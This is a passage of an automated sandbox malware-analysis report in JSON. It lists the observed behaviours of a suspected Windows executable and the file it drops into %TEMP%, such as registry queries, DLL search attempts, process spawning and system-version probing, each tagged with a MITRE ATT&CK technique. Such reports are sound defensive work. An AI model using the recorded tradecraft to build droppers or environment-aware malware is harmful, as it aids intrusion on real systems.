\"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"085cda53603755dc.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"085cda53603755dc.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76E70000\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76E70000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"085cda53603755dc.exe\" with commandline \":*C:\\\\6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0a ...\" (UID: 00000000-00002420)\n Spawned process \"085cda53603755dc.exe\" with commandline \"a ZZZZZZXVXZG\" (UID: 00000000-00002924)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"085cda53603755dc.exe\" with commandline \":*C:\\\\6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0a ...\" (UID: 00000000-00002420)\n Spawned process \"085cda53603755dc.exe\" with commandline \"a ZZZZZZXVXZG\" (UID: 00000000-00002924)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511\" was detected as \"MinGW\" and name: \"Compiler\"\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511\" was detected as \"GNU linker ld (GNU Binutils)\" and name: \"Linker\"\n \"085cda53603755dc.exe\" was detected as \"MinGW\" and name: \"Compiler\"\n \"085cda53603755dc.exe\" was detected as \"GNU linker ld (GNU Binutils)\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00004064]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\version.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FLTLIB.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Secur32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" reads file \"c:\\6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\"\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"\n \"085cda53603755dc.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"085cda53603755dc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" trying to touch file \"C:\\version.DLL\"\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\Documents\"\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\"\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ui\\SwDRM.dll\"\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" trying to touch file \"C:\\Windows\\System32\\sechost.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" writes file \"%temp%\\085cda53603755dc.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00004064]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"085cda53603755dc.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"085cda53603755dc.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"6F6F0C8738159F59EA033D8D237433BE7163AD062737E1EB4071EC9C0AE88511\"; Value: \"\")\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"CATEGORY\"; Value: \"\")\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"NAME\"; Value: \"\")\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"PARENTFOLDER\"; Value: \"\")\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"DESCRIPTION\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"085cda53603755dc.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5480748'}\" (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5480732'}\" (UID: 00000000-00002420)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \".bss\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" queries volume information of \"C:\\\" at 00000000-00004064-0000010C-152036\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00002420-0000010C-246162\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00002924-0000010C-653841", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"085cda53603755dc.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002420)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" queries volume information of \"C:\\\" at 00000000-00004064-0000010C-152036\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00002420-0000010C-246162\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00002924-0000010C-653841", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002900001e2900fb1d2900000000000000000000002600000000019cdd22000000000000eb220095e1bb7703666400feffffff435cbf775059bf77aa000000b8000000fa1d2900f81d290024df22005ce3220000000000000000000000000000000000000000000000000000000000000000001c5cbe7760d8be75ffffffff17000000d4de22002400000003000000c4e32200f0e822005ce322008600000000df220096edbf77221e2900a06a95758600000024df22005ce322000000000086008800a06a957524df2200916c9575221e2900a06a9575a06a957594e3220002020000 (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004064)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003000c8693000c3693000000000000000000000002d00000000019cdc22000000000000ea220095e1bb77986f6400feffffff435cbf775059bf77aa000000b8000000c2693000c069300024de22005ce2220000000000000000000000000000000000000000000000000000000000000000001c5cbe7760d8be75ffffffff17000000d4dd22002400000003000000c4e22200f0e722005ce222008600000000de220096edbf77ea693000a06a95758600000024de22005ce222000000000086008800a06a957524de2200916c9575ea693000a06a9575a06a957594e2220002020000 (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dcf5220000000000700000002cf62200feffffffb4f52200cf00c077d600c0770488f97770000000380000002cf622000000000088f5220000000000f0f52200 (UID: 00000000-00002420)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"085cda53603755dc.exe\" (Path: 